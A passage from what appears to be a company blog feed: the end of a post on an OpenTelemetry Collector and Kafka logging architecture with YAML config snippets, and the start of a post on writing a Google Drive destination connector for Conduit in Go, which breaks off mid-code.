&lt;p&gt;At the core is a central OpenTelemetry Collector instance. This acts as the main aggregation and processing point for all logs coming in from the sidecars. Besides routing the logs to the downstream systems, we also leverage the &lt;code class=&quot;language-text&quot;&gt;redaction&lt;/code&gt; processor to make sure sensitive data isn’t stored or exported.&lt;/p&gt;
&lt;p&gt;One of the biggest advantages of this setup is the clean decoupling it gives us. Sidecars focus only on local log capture and forwarding, while the central collector can evolve independently, allowing us to adjust processing logic, add exporters, or even further adopt the &lt;a href=&quot;https://opentelemetry.io/docs/collector/deployment/gateway/&quot;&gt;gateway deployment pattern&lt;/a&gt; without touching tenant workloads.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;env&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; KAFKA_BOOTSTRAP_SERVERS
    &lt;span class=&quot;token key atrule&quot;&gt;valueFrom&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;secretKeyRef&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; .Values.kafka.secret.name &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;key&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; .Values.kafka.secret.key &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;optional&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean important&quot;&gt;true&lt;/span&gt;
&lt;span class=&quot;token key atrule&quot;&gt;args&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;exporters.kafka.brokers=${env:KAFKA_BOOTSTRAP_SERVERS}&apos;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;...&lt;/span&gt;
&lt;span class=&quot;token key atrule&quot;&gt;exporters&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;otlphttp&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;endpoint&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &amp;lt;loki&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;endpoint&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;kafka&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;topic&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &amp;lt;topic&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;name&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;...&lt;/span&gt;
&lt;span class=&quot;token key atrule&quot;&gt;processors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;redaction&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;allow_all_keys&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean important&quot;&gt;true&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;blocked_values&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &amp;lt;regex&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &amp;lt;regex&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &amp;lt;regex&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;em&gt;Configuration snippet for our centralized OpenTelemetry Collector&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Customer Collector&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/3d0942d81ee2c13b3a4c17fac6649219/1e088/customer-collector.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 89.99999999999999%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAASCAYAAABb0P4QAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB80lEQVR42q1Ta2/UMBDs//8xCITgGxU61OZKReGqAhJNjgvpQS7Ow3HeuSRTTxpX0EbQk7C08np3PZ59+AgzaxgGHGL/fR3hP69ZwKZpUJYViqIcJctzVHWtbeU/Wc4C8mJZ5AhFgLVjI8/UvfR9/3RA87jKC3hBjK2Q2PwUuAkSuH4IP0wwHAZ4h/hDKLz6IvHycodn5xu8uPDw+msKax1rwO7wlMmiqioopSCCndZ1HbMMta4jUzYyV895wCluv99DSokkkQijWEuESEsYhhBCjP4njg0Re+zbGqmMp0e6yY7Dm+JGBRZ2gjcrF89PrnB85eHtdQwnyO5ByY4l4IgZeQw47V6gcOGkuPwusXIifLIjfFwr3el0ZN11PeI4HlNPkmTUWQrW9QHgMDF0cba1cOYtYW1OsHQtLG9ONUMbVVHpQc/GGnJe2TwyZdPYpNmx2aa/sFhbOHXe4921hePPC3zYrfDNtzF0d3NINvX0e5hu13XzTaFDSZ1a047ntm6hEjXqZEMm5vJfm8JXiqJAmqbY6dkr9ew1bQMRCvi+P6bJRrBWPDM+13+8bds/AU2aBOPLDOLOVAhuusmdPur0m3jGzTJkIFPiIPOHMJDp8SJt1AnIGNrYXcZQnwUkU9InsGFEBrRRN4Wn8Eyh72E9bwEt/3qSXmubRwAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Customer collector architecture diagram&quot;
        title=&quot;&quot;
        src=&quot;/static/3d0942d81ee2c13b3a4c17fac6649219/5a190/customer-collector.png&quot;
        srcset=&quot;/static/3d0942d81ee2c13b3a4c17fac6649219/772e8/customer-collector.png 200w,
/static/3d0942d81ee2c13b3a4c17fac6649219/e17e5/customer-collector.png 400w,
/static/3d0942d81ee2c13b3a4c17fac6649219/5a190/customer-collector.png 800w,
/static/3d0942d81ee2c13b3a4c17fac6649219/1e088/customer-collector.png 840w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;It’s become increasingly common for customers to bring their own observability stack, leveraging tools such as Datadog for logs and metrics. To support that, we run per-destination OpenTelemetry Collectors that consume logs from Kafka and forward them directly to the customer’s observability system. With this approach, logs from Conduit applications show up alongside the customer’s existing data without the customer having to adopt any additional tooling. It also helps keep things like API access keys isolated and scoped to this collector only.&lt;/p&gt;
&lt;p&gt;Kafka played a key role in making this work. Each customer’s downstream collector can independently consume their own logs from Kafka, giving us a nice way to route data per tenant.&lt;/p&gt;
&lt;p&gt;That said, there were some real-world challenges. Because each customer has unique destinations and processing needs, we couldn’t statically define exporters ahead of time. Kafka helped decouple things, but it also introduced some config complexity. The collector assumes a relatively static configuration, which doesn’t mesh well with dynamic environments like ours. Built-in service discovery could go a long way in this regard. Finally, the Kafka receiver and exporter both require broker addresses in the config, but in our case, those are only known at deploy time. We worked around this by using command-line and environment variable overrides. This is workable, but not the smoothest experience.&lt;/p&gt;
&lt;p&gt;We also leverage the Prometheus receiver to collect metrics from our Conduit pods. Conduit exposes a number of useful metrics for building monitors and alerts, and &lt;code class=&quot;language-text&quot;&gt;kubernetes_sd_configs&lt;/code&gt; lets us dynamically discover the Conduit pods to scrape. A future iteration could move this to the centralized Collector or even down to the sidecar, but for now the current solution meets our needs.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;env&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; KAFKA_BOOTSTRAP_SERVERS
    &lt;span class=&quot;token key atrule&quot;&gt;valueFrom&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;secretKeyRef&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; .Values.kafka.secret.name &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;key&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; .Values.kafka.secret.key &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;optional&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean important&quot;&gt;true&lt;/span&gt;
&lt;span class=&quot;token key atrule&quot;&gt;args&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;exporters.kafka.brokers=${env:KAFKA_BOOTSTRAP_SERVERS}&apos;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;...&lt;/span&gt;
&lt;span class=&quot;token key atrule&quot;&gt;receivers&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;kafka&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;topic&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &amp;lt;topic&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;name&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;...&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;prometheus&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;kubernetes_sd_configs&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;namespaces&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;names&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &amp;lt;namespace&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;role&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; pod
    &lt;span class=&quot;token key atrule&quot;&gt;relabel_configs&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;action&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; keep
        &lt;span class=&quot;token key atrule&quot;&gt;regex&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; conduit&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;server.*
        &lt;span class=&quot;token key atrule&quot;&gt;source_labels&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
          &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; __meta_kubernetes_pod_label_app_kubernetes_io_name
&lt;span class=&quot;token punctuation&quot;&gt;...&lt;/span&gt;
&lt;span class=&quot;token key atrule&quot;&gt;exporters&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;datadog&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;api&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;key&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; $&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;env&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;DD_API_KEY&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;site&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; $&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;env&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;DD_SITE&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;em&gt;Configuration snippet for our customer Collector&lt;/em&gt;&lt;/p&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;So far, this design has been working well for us. Customers can now access operational data both within our application and in their own Datadog instances. The feedback has been positive, with early indications showing that it&apos;s already helping teams debug issues much faster.&lt;/p&gt;
&lt;p&gt;From a systems perspective, I’m also really happy with how it turned out. The Kafka + OpenTelemetry Collector approach for customer log exporting has proven especially powerful. In fact, during a recent internal hackathon, I was able to add an entirely new log destination in just a few hours.&lt;/p&gt;
&lt;p&gt;The centralized gateway design also sets us up nicely for future growth. It gives us the ability to scale horizontally and opens the door to more advanced features down the road, like load balancers or the OpenTelemetry Collector loadbalancing exporter.&lt;/p&gt;
&lt;p&gt;We’re excited to keep evolving the system as more customers onboard and new requirements emerge. There’s always room to improve, but we’re confident we’ve laid down a strong foundation for observability in our platform that gives our customers meaningful insight and helps us operate with confidence.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Building My First Conduit Connector: A Google Drive Adventure]]></title><description><![CDATA[The story of how I built a Google Drive destination connector for Conduit from scratch—the things I learned, the hiccups I hit, and why it was totally worth it.]]></description><link>https://meroxa.com/blog/building-my-first-conduit-connector-a-google-drive-adventure</link><guid isPermaLink="false">https://meroxa.com/blog/building-my-first-conduit-connector-a-google-drive-adventure</guid><dc:creator><![CDATA[Ruben Manrique]]></dc:creator><pubDate>Mon, 12 May 2025 11:00:00 GMT</pubDate><content:encoded>&lt;p&gt;During Champagne Week—the magical time at &lt;a href=&quot;https://meroxa.com/&quot;&gt;Meroxa&lt;/a&gt; where we get to work on anything we want—I decided to dive into something totally new: building a connector for &lt;a href=&quot;https://conduit.io/&quot;&gt;Conduit&lt;/a&gt;. I’d never written a line of Go before. I’d never run Conduit locally. So, naturally, I decided to do both at once.&lt;/p&gt;
&lt;p&gt;Here’s the story of how I built a &lt;strong&gt;Google Drive destination connector&lt;/strong&gt; for Conduit from scratch—the things I learned, the hiccups I hit, and why it was totally worth it.&lt;/p&gt;
&lt;h3&gt;🥂 Champagne Week = Choose Your Own Adventure&lt;/h3&gt;
&lt;p&gt;Champagne Week is when we get to explore ideas outside the day-to-day roadmap and chase whatever sparks our curiosity. I’d been meaning to learn more about Conduit’s internals, and connectors felt like a natural place to start.&lt;/p&gt;
&lt;p&gt;Google Drive stood out as a fun target. It’s widely used, has a &lt;a href=&quot;https://developers.google.com/workspace/drive/api/guides/about-sdk&quot;&gt;solid API&lt;/a&gt;, and writing a &lt;strong&gt;destination connector&lt;/strong&gt; meant I could figure out how to reliably &lt;em&gt;push&lt;/em&gt; data into Drive.&lt;/p&gt;
&lt;p&gt;It was something that seemed both useful and interesting. On the useful side, Google Drive is a tool almost every team interacts with in some capacity—being able to automatically write data to Drive from a pipeline opens up a lot of lightweight automation use cases. Think: piping logs or daily reports straight into a shared folder, exporting transformed data for non-technical stakeholders, or syncing snapshots of datasets for backup or audit purposes.&lt;/p&gt;
&lt;p&gt;At the same time, it was interesting from a technical perspective. I got to dive into Google’s APIs, work with OAuth and service accounts, and figure out how to map abstract Conduit records into files that make sense in the context of Drive. The blend of dealing with a real-world API and building something from scratch with Go made it feel like a fun puzzle, and I came away with a much better understanding of both the language and the Conduit platform.&lt;/p&gt;
&lt;h3&gt;🛠️ Getting Conduit Running Locally&lt;/h3&gt;
&lt;p&gt;Step one: get Conduit building and running locally. This was my first time doing it, so I wasn’t totally sure what to expect. Luckily, the process was smoother than I’d feared.&lt;/p&gt;
&lt;p&gt;Here’s what I used:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Go (latest stable version)&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;make&lt;/code&gt; (used heavily in Conduit’s dev flow)&lt;/li&gt;
&lt;li&gt;VS Code + Go plugin&lt;/li&gt;
&lt;/ul&gt;
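&lt;p&gt;For context, getting a local build running boiled down to just a few commands. Roughly the following worked for me (the exact &lt;code class=&quot;language-text&quot;&gt;make&lt;/code&gt; targets may differ between Conduit versions, so check the repository’s Makefile):&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell&quot;&gt;&lt;pre class=&quot;language-shell&quot;&gt;&lt;code class=&quot;language-shell&quot;&gt;# Grab the source and build the binary
git clone https://github.com/ConduitIO/conduit.git
cd conduit
make build

# Start Conduit with its default configuration
./conduit&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;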
&lt;p&gt;I leaned heavily on the &lt;a href=&quot;https://docs.conduit.io/docs&quot;&gt;Conduit docs&lt;/a&gt;—which, thankfully, are really well written. While I leaned on the &lt;a href=&quot;https://docs.conduit.io/docs/developing/connectors/conduit-connector-template&quot;&gt;example connector template&lt;/a&gt; to get started, I also poked around other &lt;a href=&quot;https://github.com/conduitIO/?q=connector&amp;#x26;type=all&amp;#x26;language=&amp;#x26;sort=&quot;&gt;existing connectors&lt;/a&gt; to see how they were structured, which was super helpful for figuring out best practices.&lt;/p&gt;
&lt;h3&gt;📁 What the Connector Does&lt;/h3&gt;
&lt;p&gt;The connector I built is a &lt;strong&gt;&lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-google-drive&quot;&gt;Google Drive destination connector&lt;/a&gt;&lt;/strong&gt;, which means it takes records coming through a Conduit pipeline and uploads them into Google Drive.&lt;/p&gt;
&lt;p&gt;In this case:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Each record gets written as a file in a specified Drive folder.&lt;/li&gt;
&lt;li&gt;The file name can be derived from the record’s metadata.&lt;/li&gt;
&lt;li&gt;The file content comes from the record payload.&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;d &lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;Destination&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;Write&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;ctx context&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Context&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; r &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;opencdc&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Record&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;int&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token comment&quot;&gt;// Log the number of records&lt;/span&gt;
	sdk&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Logger&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;ctx&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Trace&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Int&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;records&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;len&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;r&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Msg&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Starting file uploads...&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

	&lt;span class=&quot;token comment&quot;&gt;// Initialize a counter to track the number of successfully uploaded records&lt;/span&gt;
	successfulUploads &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;

	&lt;span class=&quot;token comment&quot;&gt;// Loop through each record and upload it as a separate file&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;for&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; record &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;range&lt;/span&gt; r &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Operation &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; opencdc&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;OperationCreate &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
			&lt;span class=&quot;token comment&quot;&gt;// Skip records that are not of type Create&lt;/span&gt;
			sdk&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Logger&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;ctx&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Trace&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Msgf&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Skipping record with operation: %s&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Operation&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
			successfulUploads&lt;span class=&quot;token operator&quot;&gt;++&lt;/span&gt;
			&lt;span class=&quot;token keyword&quot;&gt;continue&lt;/span&gt;
		&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
		fileData &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;After&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Bytes&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

		&lt;span class=&quot;token comment&quot;&gt;// Create a bytes buffer to hold the record data&lt;/span&gt;
		fileBuffer &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; bytes&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;NewBuffer&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;fileData&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

		&lt;span class=&quot;token comment&quot;&gt;// Prepare the file metadata (include the folder ID in the Parents field)&lt;/span&gt;
		fileMetadata &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&amp;amp;&lt;/span&gt;drive&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;File&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
